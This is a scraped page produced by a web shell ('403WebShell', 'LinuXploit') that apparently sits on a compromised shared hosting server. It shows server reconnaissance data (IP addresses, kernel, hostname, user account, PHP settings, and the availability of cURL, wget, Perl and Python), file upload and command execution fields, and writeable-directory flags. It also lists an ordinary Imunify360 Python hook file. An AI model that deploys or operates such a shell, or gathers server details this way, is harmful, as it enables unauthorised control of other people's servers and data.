Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.144.89.197
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/imunify360/venv/lib/python3.11/site-packages/defence360agent/hooks/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/imunify360/venv/lib/python3.11/site-packages/defence360agent/hooks/execute.py
import json
import os
import subprocess
import tempfile

from defence360agent.contracts.config import Core
from defence360agent.hooks import native as native_hooks
from defence360agent.internals.logger import EventHookLogger
from defence360agent.model.event_hook import EventHook
from defence360agent.model.instance import db
from defence360agent.utils import run, snake_case

event_hook_logger = EventHookLogger()


def get_hooks(event):
    # if database is not available (i.e. direct RPC call), do not try to
    # load hooks
    if db.deferred:
        return []
    hooks = EventHook.select().where(EventHook.event == event)
    return list(hooks)


async def execute_hook(path, data, native=False):
    try:
        if native:
            native_hooks.execute_hook(path, data)
            exit_code, err = 0, None
        else:
            data = json.dumps(data).encode()
            cwd = os.path.dirname(path)
            exit_code, _, err = await run(
                path, shell=True, input=data, cwd=cwd
            )
    except Exception as e:
        exit_code, err = None, repr(e)

    return exit_code, err


async def execute_hooks(event, tempdir=Core.TMPDIR):
    dump = event.get("DUMP")
    params = dict(event)
    hooks = get_hooks(event.event)

    if not hooks:
        return

    with event_hook_logger(event.event, event.subtype) as event_logger:
        if dump:
            prefix = snake_case(event.__class__.__name__) + "_"
            tmp = tempfile.NamedTemporaryFile(
                mode="w+", prefix=prefix, suffix=".json", dir=tempdir
            )
            json.dump(dump, tmp)
            tmp.flush()
            os.fsync(tmp.fileno())
            params["tmp_filename"] = tmp.name

        data = {
            "event": event.event,
            "subtype": event.subtype,
            "params": params,
        }

        for hook in hooks:
            with event_logger(hook.path, native=hook.native) as hook_logger:
                hook_logger.begin()
                exit_code, err = await execute_hook(
                    hook.path, data, native=hook.native
                )
                hook_logger.finish(exit_code, err)

Youez - 2016 - github.com/yon3zu
LinuXploit